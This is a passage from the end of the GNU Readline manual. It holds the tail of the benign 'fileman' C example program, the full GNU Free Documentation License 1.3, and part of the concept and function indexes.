if (printed)
printf ("\n");
}
return (0);
}
/* Change to the directory ARG. */
com_cd (arg)
char *arg;
{
if (chdir (arg) == -1)
{
perror (arg);
return 1;
}
com_pwd ("");
return (0);
}
/* Print out the current working directory. */
com_pwd (ignore)
char *ignore;
{
char dir[1024], *s;
s = getcwd (dir, sizeof(dir) - 1);
if (s == 0)
{
printf ("Error getting pwd: %s\n", dir);
return 1;
}
printf ("Current directory is %s\n", dir);
return 0;
}
/* The user wishes to quit using this program.  Just set DONE non-zero. */
com_quit (arg)
char *arg;
{
done = 1;
return (0);
}
/* Function which tells you that you can’t do this. */
too_dangerous (caller)
char *caller;
{
fprintf (stderr,
         "%s: Too dangerous for me to distribute.  Write it yourself.\n",
         caller);
}
/* Return non-zero if ARG is a valid argument for CALLER, else print
an error message and return zero. */
int
valid_argument (caller, arg)
char *caller, *arg;
{
if (!arg || !*arg)
{
fprintf (stderr, "%s: Argument required.\n", caller);
return (0);
}
return (1);
}
Appendix A GNU Free Documentation License
Version 1.3, 3 November 2008
Copyright © 2000, 2001, 2002, 2007, 2008 Free Software Foundation, Inc.
http://fsf.org/
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
0. PREAMBLE
The purpose of this License is to make a manual, textbook, or other functional and
useful document free in the sense of freedom: to assure everyone the effective freedom
to copy and redistribute it, with or without modifying it, either commercially or
noncommercially. Secondarily, this License preserves for the author and publisher a way
to get credit for their work, while not being considered responsible for modifications
made by others.
This License is a kind of “copyleft”, which means that derivative works of the document
must themselves be free in the same sense. It complements the GNU General Public
License, which is a copyleft license designed for free software.
We have designed this License in order to use it for manuals for free software, because
free software needs free documentation: a free program should come with manuals
providing the same freedoms that the software does. But this License is not limited to
software manuals; it can be used for any textual work, regardless of subject matter or
whether it is published as a printed book. We recommend this License principally for
works whose purpose is instruction or reference.
1. APPLICABILITY AND DEFINITIONS
This License applies to any manual or other work, in any medium, that contains a
notice placed by the copyright holder saying it can be distributed under the terms
of this License. Such a notice grants a world-wide, royalty-free license, unlimited in
duration, to use that work under the conditions stated herein.
The “Document”, below, refers to any such manual or work. Any member of the public is a licensee, and
is addressed as “you”. You accept the license if you copy, modify or distribute the work
in a way requiring permission under copyright law.
A “Modified Version” of the Document means any work containing the Document or
a portion of it, either copied verbatim, or with modifications and/or translated into
another language.
A “Secondary Section” is a named appendix or a front-matter section of the Document
that deals exclusively with the relationship of the publishers or authors of the Document
to the Document’s overall subject (or to related matters) and contains nothing that
could fall directly within that overall subject. (Thus, if the Document is in part a
textbook of mathematics, a Secondary Section may not explain any mathematics.) The
relationship could be a matter of historical connection with the subject or with related
matters, or of legal, commercial, philosophical, ethical or political position regarding
them.
The “Invariant Sections” are certain Secondary Sections whose titles are designated, as
being those of Invariant Sections, in the notice that says that the Document is released
under this License. If a section does not fit the above definition of Secondary then it is
not allowed to be designated as Invariant. The Document may contain zero Invariant
Sections. If the Document does not identify any Invariant Sections then there are none.
The “Cover Texts” are certain short passages of text that are listed, as Front-Cover
Texts or Back-Cover Texts, in the notice that says that the Document is released under
this License. A Front-Cover Text may be at most 5 words, and a Back-Cover Text may
be at most 25 words.
A “Transparent” copy of the Document means a machine-readable copy, represented
in a format whose specification is available to the general public, that is suitable for
revising the document straightforwardly with generic text editors or (for images
composed of pixels) generic paint programs or (for drawings) some widely available drawing
editor, and that is suitable for input to text formatters or for automatic translation to
a variety of formats suitable for input to text formatters. A copy made in an otherwise
Transparent file format whose markup, or absence of markup, has been arranged to
thwart or discourage subsequent modification by readers is not Transparent. An image
format is not Transparent if used for any substantial amount of text. A copy that is
not “Transparent” is called “Opaque”.
Examples of suitable formats for Transparent copies include plain ascii without
markup, Texinfo input format, LaTEX input format, SGML or XML using a publicly
available DTD, and standard-conforming simple HTML, PostScript or PDF designed
for human modification. Examples of transparent image formats include PNG, XCF
and JPG. Opaque formats include proprietary formats that can be read and edited
only by proprietary word processors, SGML or XML for which the DTD and/or
processing tools are not generally available, and the machine-generated HTML,
PostScript or PDF produced by some word processors for output purposes only.
The “Title Page” means, for a printed book, the title page itself, plus such following
pages as are needed to hold, legibly, the material this License requires to appear in the
title page. For works in formats which do not have any title page as such, “Title Page”
means the text near the most prominent appearance of the work’s title, preceding the
beginning of the body of the text.
The “publisher” means any person or entity that distributes copies of the Document
to the public.
A section “Entitled XYZ” means a named subunit of the Document whose title either
is precisely XYZ or contains XYZ in parentheses following text that translates XYZ in
another language. (Here XYZ stands for a specific section name mentioned below, such
as “Acknowledgements”, “Dedications”, “Endorsements”, or “History”.) To “Preserve
the Title” of such a section when you modify the Document means that it remains a
section “Entitled XYZ” according to this definition.
The Document may include Warranty Disclaimers next to the notice which states that
this License applies to the Document. These Warranty Disclaimers are considered to
be included by reference in this License, but only as regards disclaiming warranties:
any other implication that these Warranty Disclaimers may have is void and has no
effect on the meaning of this License.
2. VERBATIM COPYING
You may copy and distribute the Document in any medium, either commercially or
noncommercially, provided that this License, the copyright notices, and the license
notice saying this License applies to the Document are reproduced in all copies, and
that you add no other conditions whatsoever to those of this License. You may not use
technical measures to obstruct or control the reading or further copying of the copies
you make or distribute. However, you may accept compensation in exchange for copies.
If you distribute a large enough number of copies you must also follow the conditions
in section 3.
You may also lend copies, under the same conditions stated above, and you may publicly
display copies.
3. COPYING IN QUANTITY
If you publish printed copies (or copies in media that commonly have printed covers) of
the Document, numbering more than 100, and the Document’s license notice requires
Cover Texts, you must enclose the copies in covers that carry, clearly and legibly, all
these Cover Texts: Front-Cover Texts on the front cover, and Back-Cover Texts on
the back cover. Both covers must also clearly and legibly identify you as the publisher
of these copies. The front cover must present the full title with all words of the title
equally prominent and visible. You may add other material on the covers in addition.
Copying with changes limited to the covers, as long as they preserve the title of the
Document and satisfy these conditions, can be treated as verbatim copying in other
respects.
If the required texts for either cover are too voluminous to fit legibly, you should put
the first ones listed (as many as fit reasonably) on the actual cover, and continue the
rest onto adjacent pages.
If you publish or distribute Opaque copies of the Document numbering more than 100,
you must either include a machine-readable Transparent copy along with each Opaque
copy, or state in or with each Opaque copy a computer-network location from which
the general network-using public has access to download using public-standard network
protocols a complete Transparent copy of the Document, free of added material. If
you use the latter option, you must take reasonably prudent steps, when you begin
distribution of Opaque copies in quantity, to ensure that this Transparent copy will
remain thus accessible at the stated location until at least one year after the last time
you distribute an Opaque copy (directly or through your agents or retailers) of that
edition to the public.
It is requested, but not required, that you contact the authors of the Document well
before redistributing any large number of copies, to give them a chance to provide you
with an updated version of the Document.
4. MODIFICATIONS
You may copy and distribute a Modified Version of the Document under the conditions
of sections 2 and 3 above, provided that you release the Modified Version under precisely
this License, with the Modified Version filling the role of the Document, thus licensing
distribution and modification of the Modified Version to whoever possesses a copy of
it. In addition, you must do these things in the Modified Version:
A. Use in the Title Page (and on the covers, if any) a title distinct from that of the
Document, and from those of previous versions (which should, if there were any,
be listed in the History section of the Document). You may use the same title as
a previous version if the original publisher of that version gives permission.
B. List on the Title Page, as authors, one or more persons or entities responsible for
authorship of the modifications in the Modified Version, together with at least five
of the principal authors of the Document (all of its principal authors, if it has fewer
than five), unless they release you from this requirement.
C. State on the Title page the name of the publisher of the Modified Version, as the
publisher.
D. Preserve all the copyright notices of the Document.
E. Add an appropriate copyright notice for your modifications adjacent to the other
copyright notices.
F. Include, immediately after the copyright notices, a license notice giving the public
permission to use the Modified Version under the terms of this License, in the form
shown in the Addendum below.
G. Preserve in that license notice the full lists of Invariant Sections and required Cover
Texts given in the Document’s license notice.
H. Include an unaltered copy of this License.
I. Preserve the section Entitled “History”, Preserve its Title, and add to it an item
stating at least the title, year, new authors, and publisher of the Modified Version
as given on the Title Page. If there is no section Entitled “History” in the
Document, create one stating the title, year, authors, and publisher of the Document
as given on its Title Page, then add an item describing the Modified Version as
stated in the previous sentence.
J. Preserve the network location, if any, given in the Document for public access to
a Transparent copy of the Document, and likewise the network locations given in
the Document for previous versions it was based on. These may be placed in the
“History” section. You may omit a network location for a work that was published
at least four years before the Document itself, or if the original publisher of the
version it refers to gives permission.
K. For any section Entitled “Acknowledgements” or “Dedications”, Preserve the Title
of the section, and preserve in the section all the substance and tone of each of the
contributor acknowledgements and/or dedications given therein.
L. Preserve all the Invariant Sections of the Document, unaltered in their text and
in their titles. Section numbers or the equivalent are not considered part of the
section titles.
M. Delete any section Entitled “Endorsements”. Such a section may not be included
in the Modified Version.
N. Do not retitle any existing section to be Entitled “Endorsements” or to conflict in
title with any Invariant Section.
O. Preserve any Warranty Disclaimers.
If the Modified Version includes new front-matter sections or appendices that qualify
as Secondary Sections and contain no material copied from the Document, you may at
your option designate some or all of these sections as invariant. To do this, add their
titles to the list of Invariant Sections in the Modified Version’s license notice. These
titles must be distinct from any other section titles.
You may add a section Entitled “Endorsements”, provided it contains nothing but
endorsements of your Modified Version by various parties—for example, statements of
peer review or that the text has been approved by an organization as the authoritative
definition of a standard.
You may add a passage of up to five words as a Front-Cover Text, and a passage of up
to 25 words as a Back-Cover Text, to the end of the list of Cover Texts in the Modified
Version. Only one passage of Front-Cover Text and one of Back-Cover Text may be
added by (or through arrangements made by) any one entity. If the Document already
includes a cover text for the same cover, previously added by you or by arrangement
made by the same entity you are acting on behalf of, you may not add another; but
you may replace the old one, on explicit permission from the previous publisher that
added the old one.
The author(s) and publisher(s) of the Document do not by this License give permission
to use their names for publicity for or to assert or imply endorsement of any Modified
Version.
5. COMBINING DOCUMENTS
You may combine the Document with other documents released under this License,
under the terms defined in section 4 above for modified versions, provided that you
include in the combination all of the Invariant Sections of all of the original documents,
unmodified, and list them all as Invariant Sections of your combined work in its license
notice, and that you preserve all their Warranty Disclaimers.
The combined work need only contain one copy of this License, and multiple identical
Invariant Sections may be replaced with a single copy. If there are multiple Invariant
Sections with the same name but different contents, make the title of each such section
unique by adding at the end of it, in parentheses, the name of the original author or
publisher of that section if known, or else a unique number. Make the same adjustment
to the section titles in the list of Invariant Sections in the license notice of the combined
work.
In the combination, you must combine any sections Entitled “History” in the
various original documents, forming one section Entitled “History”; likewise combine any
sections Entitled “Acknowledgements”, and any sections Entitled “Dedications”. You
must delete all sections Entitled “Endorsements.”
6. COLLECTIONS OF DOCUMENTS
You may make a collection consisting of the Document and other documents released
under this License, and replace the individual copies of this License in the various
documents with a single copy that is included in the collection, provided that you
follow the rules of this License for verbatim copying of each of the documents in all
other respects.
You may extract a single document from such a collection, and distribute it
individually under this License, provided you insert a copy of this License into the extracted
document, and follow this License in all other respects regarding verbatim copying of
that document.
7. AGGREGATION WITH INDEPENDENT WORKS
A compilation of the Document or its derivatives with other separate and independent
documents or works, in or on a volume of a storage or distribution medium, is called
an “aggregate” if the copyright resulting from the compilation is not used to limit the
legal rights of the compilation’s users beyond what the individual works permit. When
the Document is included in an aggregate, this License does not apply to the other
works in the aggregate which are not themselves derivative works of the Document.
If the Cover Text requirement of section 3 is applicable to these copies of the Document,
then if the Document is less than one half of the entire aggregate, the Document’s Cover
Texts may be placed on covers that bracket the Document within the aggregate, or the
electronic equivalent of covers if the Document is in electronic form. Otherwise they
must appear on printed covers that bracket the whole aggregate.
8. TRANSLATION
Translation is considered a kind of modification, so you may distribute translations
of the Document under the terms of section 4. Replacing Invariant Sections with
translations requires special permission from their copyright holders, but you may
include translations of some or all Invariant Sections in addition to the original versions
of these Invariant Sections. You may include a translation of this License, and all the
license notices in the Document, and any Warranty Disclaimers, provided that you
also include the original English version of this License and the original versions of
those notices and disclaimers. In case of a disagreement between the translation and
the original version of this License or a notice or disclaimer, the original version will
prevail.
If a section in the Document is Entitled “Acknowledgements”, “Dedications”, or
“History”, the requirement (section 4) to Preserve its Title (section 1) will typically require
changing the actual title.
9. TERMINATION
You may not copy, modify, sublicense, or distribute the Document except as expressly
provided under this License. Any attempt otherwise to copy, modify, sublicense, or
distribute it is void, and will automatically terminate your rights under this License.
However, if you cease all violation of this License, then your license from a particular
copyright holder is reinstated (a) provisionally, unless and until the copyright holder
explicitly and finally terminates your license, and (b) permanently, if the copyright
holder fails to notify you of the violation by some reasonable means prior to 60 days
after the cessation.
Moreover, your license from a particular copyright holder is reinstated permanently if
the copyright holder notifies you of the violation by some reasonable means, this is the
first time you have received notice of violation of this License (for any work) from that
copyright holder, and you cure the violation prior to 30 days after your receipt of the
notice.
Termination of your rights under this section does not terminate the licenses of parties
who have received copies or rights from you under this License. If your rights have
been terminated and not permanently reinstated, receipt of a copy of some or all of the
same material does not give you any rights to use it.
10. FUTURE REVISIONS OF THIS LICENSE
The Free Software Foundation may publish new, revised versions of the GNU Free
Documentation License from time to time. Such new versions will be similar in spirit
to the present version, but may differ in detail to address new problems or concerns.
See http://www.gnu.org/copyleft/.
Each version of the License is given a distinguishing version number. If the Document
specifies that a particular numbered version of this License “or any later version”
applies to it, you have the option of following the terms and conditions either of that
specified version or of any later version that has been published (not as a draft) by
the Free Software Foundation. If the Document does not specify a version number of
this License, you may choose any version ever published (not as a draft) by the Free
Software Foundation. If the Document specifies that a proxy can decide which future
versions of this License can be used, that proxy’s public statement of acceptance of a
version permanently authorizes you to choose that version for the Document.
11. RELICENSING
“Massive Multiauthor Collaboration Site” (or “MMC Site”) means any World Wide
Web server that publishes copyrightable works and also provides prominent facilities
for anybody to edit those works. A public wiki that anybody can edit is an example of
such a server. A “Massive Multiauthor Collaboration” (or “MMC”) contained in the
site means any set of copyrightable works thus published on the MMC site.
“CC-BY-SA” means the Creative Commons Attribution-Share Alike 3.0 license
published by Creative Commons Corporation, a not-for-profit corporation with a principal
place of business in San Francisco, California, as well as future copyleft versions of that
license published by that same organization.
“Incorporate” means to publish or republish a Document, in whole or in part, as part
of another Document.
An MMC is “eligible for relicensing” if it is licensed under this License, and if all works
that were first published under this License somewhere other than this MMC, and
subsequently incorporated in whole or in part into the MMC, (1) had no cover texts
or invariant sections, and (2) were thus incorporated prior to November 1, 2008.
The operator of an MMC Site may republish an MMC contained in the site under
CC-BY-SA on the same site at any time before August 1, 2009, provided the MMC is
eligible for relicensing.
ADDENDUM: How to use this License for your documents
To use this License in a document you have written, include a copy of the License in the
document and put the following copyright and license notices just after the title page:
Copyright (C)  year  your name.
Permission is granted to copy, distribute and/or modify this document
under the terms of the GNU Free Documentation License, Version 1.3
or any later version published by the Free Software Foundation;
with no Invariant Sections, no Front-Cover Texts, and no Back-Cover
Texts.
A copy of the license is included in the section entitled ‘‘GNU
Free Documentation License’’.
If you have Invariant Sections, Front-Cover Texts and Back-Cover Texts, replace the
“with...Texts.” line with this:
with the Invariant Sections being list their titles, with
the Front-Cover Texts being list, and with the Back-Cover Texts
being list.
If you have Invariant Sections without Cover Texts, or some other combination of the
three, merge those two alternatives to suit the situation.
If your document contains nontrivial examples of program code, we recommend releasing
these examples in parallel under your choice of free software license, such as the GNU
General Public License, to permit their use in free software.
Concept Index
A
application-specific completion functions . . . . . . . 41
C
command editing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
E
editing command lines . . . . . . . . . . . . . . . . . . . . . . . . . . 1
I
initialization file, readline . . . . . . . . . . . . . . . . . . . . . . . 4
interaction, readline . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
K
kill ring . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
killing text . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
N
notation, readline . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
R
readline, function . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20
V
variables, readline . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
Y
yanking text . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
Function and Variable Index
_rl_digit_p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36
_rl_digit_value . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36
_rl_lowercase_p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36
_rl_to_lower . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36
_rl_to_upper . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36
_rl_uppercase_p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36
A
abort (C-g) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18
accept-line (Newline or Return). . . . . . . . . . . . . 13
B
backward-char (C-b). . . . . . . . . . . . . . . . . . . . . . . . . . 13
backward-delete-char (Rubout) . . . . . . . . . . . . . . 15
backward-kill-line (C-x Rubout) . . . . . . . . . . . . 16
backward-kill-word (M-DEL). . . . . . . . . . . . . . . . . . 16
backward-word (M-b). . . . . . . . . . . . . . . . . . . . . . . . . . 13
beginning-of-history (M-<). . . . . . . . . . . . . . . . . . 14
beginning-of-line (C-a) . . . . . . . . . . . . . . . . . . . . . 13
bell-style . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
bind-tty-special-chars . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
C
call-last-kbd-macro (C-x e) . . . . . . . . . . . . . . . . . 18
capitalize-word (M-c) . . . . . . . . . . . . . . . . . . . . . . . 15
character-search (C-]) . . . . . . . . . . . . . . . . . . . . . . 18
character-search-backward (M-C-]). . . . . . . . . . 18
clear-screen (C-l). . . . . . . . . . . . . . . . . . . . . . . . . . . 13
comment-begin . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
complete (TAB) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17
completion-prefix-display-length. . . . . . . . . . . . . . . . . 5
completion-query-items . . . . . . . . . . . . . . . . . . . . . . . . . 5
convert-meta . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
copy-backward-word () . . . . . . . . . . . . . . . . . . . . . . . 16
copy-forward-word () . . . . . . . . . . . . . . . . . . . . . . . . 16
copy-region-as-kill () . . . . . . . . . . . . . . . . . . . . . . 16
D
delete-char (C-d) . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15
delete-char-or-list () . . . . . . . . . . . . . . . . . . . . . . 17
delete-horizontal-space (). . . . . . . . . . . . . . . . . . 16
digit-argument (M-0, M-1, ... M--). . . . . . . . . . 17
disable-completion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
do-uppercase-version (M-a, M-b, M-x, ...)
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18
downcase-word (M-l). . . . . . . . . . . . . . . . . . . . . . . . . . 15
dump-functions () . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19
dump-macros () . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19
dump-variables () . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19
E
editing-mode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
emacs-editing-mode (C-e) . . . . . . . . . . . . . . . . . . . . 19
enable-keypad . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
end-kbd-macro (C-x )). . . . . . . . . . . . . . . . . . . . . . . . 18
end-of-history (M->) . . . . . . . . . . . . . . . . . . . . . . . . 14
end-of-line (C-e) . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
exchange-point-and-mark (C-x C-x) . . . . . . . . . . 18
expand-tilde . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
F
forward-backward-delete-char () . . . . . . . . . . . . 15
forward-char (C-f). . . . . . . . . . . . . . . . . . . . . . . . . . . 13
forward-search-history (C-s) . . . . . . . . . . . . . . . 14
forward-word (M-f). . . . . . . . . . . . . . . . . . . . . . . . . . . 13
H
history-preserve-point. . . . . . . . . . . . . . . . . . . . . . . . . . . 6
history-search-backward (). . . . . . . . . . . . . . . . . . 14
history-search-forward (). . . . . . . . . . . . . . . . . . . 14
history-size . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
horizontal-scroll-mode . . . . . . . . . . . . . . . . . . . . . . . . . . 6
I
input-meta . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
insert-comment (M-#) . . . . . . . . . . . . . . . . . . . . . . . . 19
insert-completions (M-*) . . . . . . . . . . . . . . . . . . . . 17
isearch-terminators . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
K
keymap. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
kill-line (C-k) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
kill-region () . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
kill-whole-line (). . . . . . . . . . . . . . . . . . . . . . . . . . . 16
kill-word (M-d) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
M
mark-modified-lines . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
mark-symlinked-directories. . . . . . . . . . . . . . . . . . . . . . 7
match-hidden-files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
menu-complete () . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17
menu-complete-backward (). . . . . . . . . . . . . . . . . . . 17
meta-flag . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
N
next-history (C-n). . . . . . . . . . . . . . . . . . . . . . . . . . . 14
non-incremental-forward-search-history (M-n)
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
non-incremental-reverse-search-history (M-p)
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
O
output-meta . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
overwrite-mode () . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15
P
page-completions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
possible-completions (M-?). . . . . . . . . . . . . . . . . . 17
prefix-meta (ESC) . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18
previous-history (C-p) . . . . . . . . . . . . . . . . . . . . . . 13
Q
quoted-insert (C-q or C-v) . . . . . . . . . . . . . . . . . . 15
R
re-read-init-file (C-x C-r) . . . . . . . . . . . . . . . . . 18
readline . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20
redraw-current-line () . . . . . . . . . . . . . . . . . . . . . . 13
reverse-search-history (C-r) . . . . . . . . . . . . . . . 14
revert-all-at-newline . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
revert-line (M-r) . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18
rl_add_defun . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 28
rl_add_funmap_entry . . . . . . . . . . . . . . . . . . . . . . . . . 31
rl_add_undo . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32
rl_alphabetic . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
rl_already_prompted . . . . . . . . . . . . . . . . . . . . . . . . . 24
rl_attempted_completion_function . . . . . . . . . . 43
rl_attempted_completion_over . . . . . . . . . . . . . . . 47
rl_basic_quote_characters . . . . . . . . . . . . . . . . . . 45
rl_basic_word_break_characters. . . . . . . . . . . . . 45
rl_begin_undo_group . . . . . . . . . . . . . . . . . . . . . . . . . 31
rl_bind_key . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 29
rl_bind_key_if_unbound . . . . . . . . . . . . . . . . . . . . . . 29
rl_bind_key_if_unbound_in_map. . . . . . . . . . . . . . 29
rl_bind_key_in_map . . . . . . . . . . . . . . . . . . . . . . . . . . 29
rl_bind_keyseq . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 29
rl_bind_keyseq_if_unbound . . . . . . . . . . . . . . . . . . 30
rl_bind_keyseq_if_unbound_in_map . . . . . . . . . . 30
rl_bind_keyseq_in_map . . . . . . . . . . . . . . . . . . . . . . . 30
rl_binding_keymap. . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
rl_callback_handler_install . . . . . . . . . . . . . . . . 37
rl_callback_handler_remove . . . . . . . . . . . . . . . . . 37
rl_callback_read_char . . . . . . . . . . . . . . . . . . . . . . . 37
rl_catch_signals. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 39
rl_catch_sigwinch. . . . . . . . . . . . . . . . . . . . . . . . . . . . 40
rl_char_is_quoted_p . . . . . . . . . . . . . . . . . . . . . . . . . 44
rl_cleanup_after_signal. . . . . . . . . . . . . . . . . . . . . 40
rl_clear_message. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
rl_clear_pending_input . . . . . . . . . . . . . . . . . . . . . . 34
rl_clear_signals. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41
rl_complete . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42
rl_complete_internal . . . . . . . . . . . . . . . . . . . . . . . . 42
rl_completer_quote_characters. . . . . . . . . . . . . . 45
rl_completer_word_break_characters . . . . . . . . 45
rl_completion_append_character. . . . . . . . . . . . . 45
rl_completion_display_matches_hook . . . . . . . . 44
rl_completion_entry_function . . . . . . . . . . . 42, 43
rl_completion_found_quote . . . . . . . . . . . . . . . . . . 46
rl_completion_invoking_key . . . . . . . . . . . . . . . . . 47
rl_completion_mark_symlink_dirs . . . . . . . . . . . 46
rl_completion_matches . . . . . . . . . . . . . . . . . . . . . . . 42
rl_completion_mode . . . . . . . . . . . . . . . . . . . . . . . . . . 42
rl_completion_query_items . . . . . . . . . . . . . . . . . . 45
rl_completion_quote_character. . . . . . . . . . . . . . 46
rl_completion_suppress_append. . . . . . . . . . . . . . 46
rl_completion_suppress_quote . . . . . . . . . . . . . . . 46
rl_completion_type . . . . . . . . . . . . . . . . . . . . . . . . . . 47
rl_completion_word_break_hook. . . . . . . . . . . . . . 45
rl_copy_keymap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 28
rl_copy_text . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
rl_crlf . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32
rl_delete_text . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
rl_deprep_term_function. . . . . . . . . . . . . . . . . . . . . 25
rl_deprep_terminal . . . . . . . . . . . . . . . . . . . . . . . . . . 35
rl_ding . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
rl_directory_completion_hook . . . . . . . . . . . . . . . 44
rl_discard_keymap. . . . . . . . . . . . . . . . . . . . . . . . . . . . 28
rl_dispatching . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
rl_display_match_list . . . . . . . . . . . . . . . . . . . . . . . 36
rl_display_prompt. . . . . . . . . . . . . . . . . . . . . . . . . . . . 24
rl_do_undo. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32
rl_done . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
rl_echo_signal_char . . . . . . . . . . . . . . . . . . . . . . . . . 40
rl_editing_mode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27
rl_end . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
rl_end_undo_group. . . . . . . . . . . . . . . . . . . . . . . . . . . . 31
rl_erase_empty_line . . . . . . . . . . . . . . . . . . . . . . . . . 23
rl_event_hook . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
rl_execute_next . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 34
rl_executing_keymap . . . . . . . . . . . . . . . . . . . . . . . . . 25
rl_executing_macro . . . . . . . . . . . . . . . . . . . . . . . . . . 25
rl_expand_prompt. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
rl_explicit_arg . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27
rl_extend_line_buffer . . . . . . . . . . . . . . . . . . . . . . . 35
rl_filename_completion_desired. . . . . . . . . . . . . 46
rl_filename_completion_function . . . . . . . . . . . 43
rl_filename_dequoting_function. . . . . . . . . . . . . 43
rl_filename_quote_characters . . . . . . . . . . . . . . . 45
rl_filename_quoting_desired . . . . . . . . . . . . . . . . 46
rl_filename_quoting_function . . . . . . . . . . . . . . . 43
rl_filename_rewrite_hook . . . . . . . . . . . . . . . . . . . 44
rl_forced_update_display . . . . . . . . . . . . . . . . . . . 32
rl_free . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
rl_free_keymap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 28
rl_free_line_state . . . . . . . . . . . . . . . . . . . . . . . . . . 40
rl_free_undo_list. . . . . . . . . . . . . . . . . . . . . . . . . . . . 32
rl_function_dumper . . . . . . . . . . . . . . . . . . . . . . . . . . 31
rl_function_of_keyseq . . . . . . . . . . . . . . . . . . . . . . . 30
rl_funmap_names . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31
rl_generic_bind . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30
rl_get_keymap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 28
rl_get_keymap_by_name . . . . . . . . . . . . . . . . . . . . . . . 28
rl_get_keymap_name . . . . . . . . . . . . . . . . . . . . . . . . . . 28
rl_get_screen_size . . . . . . . . . . . . . . . . . . . . . . . . . . 40
rl_get_termcap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 37
rl_getc . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 34
rl_getc_function. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
rl_gnu_readline_p. . . . . . . . . . . . . . . . . . . . . . . . . . . . 24
rl_ignore_completion_duplicates . . . . . . . . . . . 46
rl_ignore_some_completions_function . . . . . . . 44
rl_inhibit_completion . . . . . . . . . . . . . . . . . . . . . . . 47
rl_initialize . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
rl_insert_completions . . . . . . . . . . . . . . . . . . . . . . . 42
